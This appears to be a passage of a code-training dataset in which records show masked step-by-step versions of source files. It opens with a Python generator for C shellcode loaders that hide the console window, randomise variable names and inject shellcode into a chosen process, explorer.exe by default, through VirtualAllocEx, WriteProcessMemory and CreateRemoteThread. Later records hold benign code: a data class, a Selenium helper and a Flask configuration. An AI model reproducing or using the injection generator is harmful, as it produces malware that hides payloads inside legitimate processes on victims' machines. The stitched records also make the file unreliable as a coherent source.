Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-5": "from lib import gen, core\n\n\n\nShellcode = gen.Varname_Creator()\nHide_Window = gen.Varname_Creator()\n\n\n\ndef Start():\n Start_Code = \"#include <windows.h>\\n\"\n Start_Code += \"#include <tlhelp32.h>\\n\"\n Start_Code += \"#include <stdio.h>\\n\"\n Start_Code += \"#include <stdlib.h>\\n\"\n Start_Code += \"#include <string.h>\\n\"\n Start_Code += \"int main(int argc, char **argv) {\"\n Start_Code += \"char \" + Shellcode + \"[] = {\"\n return Start_Code\n\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = \"};\\nHWND \" + Hide_Window + \" = GetConsoleWindow();\"\n Hide_Window_Console_Code += \"ShowWindow(\" + Hide_Window + \", SW_HIDE);\"\n return Hide_Window_Console_Code\n\n\n\ndef Local_Or_Remote():\n print(\"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\")\n\n Choice = core.core_input()\n\n if Choice == \"1\":\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\n elif Choice == \"2\":\n print(\"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? (DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\")\n\n ProcessName = core.core_input()\n\n if ProcessName != \"\":\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n\n else:\n ProcessName = \"explorer.exe\"\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n\n\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\n\ndef End_Local_Thread_Injection():\n\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = \"void *\" + Exec + \" = VirtualAlloc(0, sizeof \" + Shellcode + \", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\"\n Local_Thread_Injection += \"memcpy(\" + Exec + \", \" + Shellcode + \", sizeof \" + Shellcode + \");\"\n Local_Thread_Injection += \"((void(*)())\" + Exec + \")();}\"\n return Local_Thread_Injection\n\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n\n Remote_Thread_Injection = \"PROCESSENTRY32 \" + Entry + \";\"\n Remote_Thread_Injection += Entry + \".dwSize = sizeof(PROCESSENTRY32);\"\n Remote_Thread_Injection += \"HANDLE \" + Snapshot + \" = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\"\n Remote_Thread_Injection += \"if (Process32First(\" + Snapshot + \", &\" + Entry + \") == TRUE){\"\n Remote_Thread_Injection += \"while (Process32Next(\" + Snapshot + \", &\" + Entry + \") == TRUE){\"\n Remote_Thread_Injection += 'if (stricmp(' + Entry + '.szExeFile, ' + '\"' + ProcessName + '\"' + ') == 0){'\n Remote_Thread_Injection += \"HANDLE \" + Process_Handle + \";\"\n Remote_Thread_Injection += \"HANDLE \" + Remote_Thread + \";\"\n Remote_Thread_Injection += \"PVOID \" + Remote_Buffer + \";\"\n Remote_Thread_Injection += Process_Handle + \" = OpenProcess(PROCESS_ALL_ACCESS, FALSE, \" + Entry + \".th32ProcessID);\"\n Remote_Thread_Injection += Remote_Buffer + \" = VirtualAllocEx(\" + Process_Handle + \", NULL, sizeof \" + Shellcode + \", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\"\n Remote_Thread_Injection += \"WriteProcessMemory(\" + Process_Handle + \", \" + Remote_Buffer + \", \" + Shellcode + \", sizeof \" + Shellcode + \", NULL);\"\n Remote_Thread_Injection += Remote_Thread + \" = CreateRemoteThread(\" + Process_Handle + \", NULL, 0, (LPTHREAD_START_ROUTINE)\" + Remote_Buffer + \", NULL, 0, NULL);\"\n Remote_Thread_Injection += \"CloseHandle(\" + Process_Handle + \");}}}\"\n Remote_Thread_Injection += \"CloseHandle(\" + Snapshot + \");}\"\n\n return Remote_Thread_Injection",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import datetime
class Dato:
def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime):
self.__id = id
self.__dato = dato
self.__tipo = tipo
self.__fecha = fecha
def getId(self):
return self.__id
def setId(self, id):
self.__id = id
def getDato(self):
return self.__dato
def setDato(self, dato):
self.__dato = dato
def getTipo(self):
return self.__tipo
def setTipo(self, tipo):
self.__tipo = tipo
def getFecha(self):
return self.__fecha
def setFecha(self, fecha):
self.__fecha = fecha
|
normal
|
{
"blob_id": "95256390e1e7e9227b96dccce33082de9d2cddd3",
"index": 5158,
"step-1": "<mask token>\n\n\nclass Dato:\n <mask token>\n <mask token>\n\n def setId(self, id):\n self.__id = id\n <mask token>\n\n def setDato(self, dato):\n self.__dato = dato\n <mask token>\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-2": "<mask token>\n\n\nclass Dato:\n\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime\n ):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n <mask token>\n\n def setId(self, id):\n self.__id = id\n <mask token>\n\n def setDato(self, dato):\n self.__dato = dato\n <mask token>\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-3": "<mask token>\n\n\nclass Dato:\n\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime\n ):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n\n def getId(self):\n return self.__id\n\n def setId(self, id):\n self.__id = id\n <mask token>\n\n def setDato(self, dato):\n self.__dato = dato\n\n def getTipo(self):\n return self.__tipo\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-4": "<mask token>\n\n\nclass Dato:\n\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime\n ):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n\n def getId(self):\n return self.__id\n\n def setId(self, id):\n self.__id = id\n\n def getDato(self):\n return self.__dato\n\n def setDato(self, dato):\n self.__dato = dato\n\n def getTipo(self):\n return self.__tipo\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-5": "import datetime\n\nclass Dato:\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n\n def getId(self):\n return self.__id\n\n def setId(self, id):\n self.__id = id\n\n def getDato(self):\n return self.__dato\n\n def setDato(self, dato):\n self.__dato = dato\n\n def getTipo(self):\n return self.__tipo\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha",
"step-ids": [
6,
7,
9,
10,
12
]
}
|
[
6,
7,
9,
10,
12
] |
<|reserved_special_token_0|>
class Base:
<|reserved_special_token_0|>
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window()
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.
presence_of_element_located(locator))
return element
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element_value(locator, value))
return result
except:
return False
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Base:
def __init__(self, driver):
self.driver = driver
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window()
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.
presence_of_element_located(locator))
return element
def find_elements(self, locator, timeout=10):
elements = WebDriverWait(self.driver, timeout).until(EC.
presence_of_all_elements_located(locator))
return elements
<|reserved_special_token_0|>
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element_value(locator, value))
return result
except:
return False
def close_browser(self):
self.driver.quit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def open_browser(browser='chrome'):
driver = None
if browser == 'chrome':
driver = webdriver.Chrome()
elif browser == 'firefox':
driver = webdriver.Firefox()
elif browser == 'ie':
driver = webdriver.Ie()
else:
print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
return driver
class Base:
def __init__(self, driver):
self.driver = driver
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window()
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.
presence_of_element_located(locator))
return element
def find_elements(self, locator, timeout=10):
elements = WebDriverWait(self.driver, timeout).until(EC.
presence_of_all_elements_located(locator))
return elements
def click(self, locator, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.click()
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element_value(locator, value))
return result
except:
return False
def close_browser(self):
self.driver.quit()
<|reserved_special_token_1|>
import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_browser(browser='chrome'):
driver = None
if browser == 'chrome':
driver = webdriver.Chrome()
elif browser == 'firefox':
driver = webdriver.Firefox()
elif browser == 'ie':
driver = webdriver.Ie()
else:
print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
return driver
class Base:
def __init__(self, driver):
self.driver = driver
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window()
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.
presence_of_element_located(locator))
return element
def find_elements(self, locator, timeout=10):
elements = WebDriverWait(self.driver, timeout).until(EC.
presence_of_all_elements_located(locator))
return elements
def click(self, locator, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.click()
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element_value(locator, value))
return result
except:
return False
def close_browser(self):
self.driver.quit()
<|reserved_special_token_1|>
import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_browser(browser="chrome"):
driver = None
if browser == "chrome":
driver = webdriver.Chrome()
elif browser == "firefox":
driver = webdriver.Firefox()
elif browser == "ie":
driver = webdriver.Ie()
else:
# driver = None
print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
return driver
class Base:
def __init__(self, driver):
self.driver = driver
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window() # 窗口最大化
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located(locator))
return element
def find_elements(self, locator, timeout=10):
elements = WebDriverWait(self.driver, timeout).until(EC.presence_of_all_elements_located(locator))
return elements
def click(self, locator, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.click()
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(
EC.text_to_be_present_in_element_value(locator, value))
return result
except:
return False
def close_browser(self):
self.driver.quit()
|
flexible
|
{
"blob_id": "82fc86e44d02c45d7904139e4dfdff069e2bdb90",
"index": 5634,
"step-1": "<mask token>\n\n\nclass Base:\n <mask token>\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n <mask token>\n <mask token>\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Base:\n\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_all_elements_located(locator))\n return elements\n <mask token>\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n",
"step-3": "<mask token>\n\n\ndef open_browser(browser='chrome'):\n driver = None\n if browser == 'chrome':\n driver = webdriver.Chrome()\n elif browser == 'firefox':\n driver = webdriver.Firefox()\n elif browser == 'ie':\n driver = webdriver.Ie()\n else:\n print(\"请输入正确的浏览器,例如'chrome','Firefox','ie'\")\n return driver\n\n\nclass Base:\n\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.click()\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n",
"step-4": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef open_browser(browser='chrome'):\n driver = None\n if browser == 'chrome':\n driver = webdriver.Chrome()\n elif browser == 'firefox':\n driver = webdriver.Firefox()\n elif browser == 'ie':\n driver = webdriver.Ie()\n else:\n print(\"请输入正确的浏览器,例如'chrome','Firefox','ie'\")\n return driver\n\n\nclass Base:\n\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.click()\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n",
"step-5": "import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef open_browser(browser=\"chrome\"):\n driver = None\n if browser == \"chrome\":\n driver = webdriver.Chrome()\n elif browser == \"firefox\":\n driver = webdriver.Firefox()\n elif browser == \"ie\":\n driver = webdriver.Ie()\n else:\n # driver = None\n print(\"请输入正确的浏览器,例如'chrome','Firefox','ie'\")\n return driver\n\n\nclass Base:\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window() # 窗口最大化\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.click()\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(\n EC.text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n\n\n\n",
"step-ids": [
6,
9,
11,
12,
13
]
}
|
[
6,
9,
11,
12,
13
] |
<|reserved_special_token_0|>
class Config:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if os.path.exists('/etc/config.json'):
with open('/etc/config.json') as config_file:
config = json.load(config_file)
else:
with open('dev_config.json') as config_file:
config = json.load(config_file)
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
basedir = os.path.abspath(os.path.dirname(__file__))
if os.path.exists('/etc/config.json'):
with open('/etc/config.json') as config_file:
config = json.load(config_file)
else:
with open('dev_config.json') as config_file:
config = json.load(config_file)
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
config = {'development': DevelopmentConfig, 'testing': TestingConfig,
'production': ProductionConfig}
<|reserved_special_token_1|>
import os
import json
basedir = os.path.abspath(os.path.dirname(__file__))
# CHECK IF PRODUCTION CONFIG EXISTS
if os.path.exists('/etc/config.json'):
with open('/etc/config.json') as config_file:
config = json.load(config_file)
else:
with open('dev_config.json') as config_file:
config = json.load(config_file)
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig
}
|
flexible
|
{
"blob_id": "1f7147c914eee37776c0418575e93e3d36ee3aa5",
"index": 7099,
"step-1": "<mask token>\n\n\nclass Config:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n",
"step-3": "<mask token>\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n",
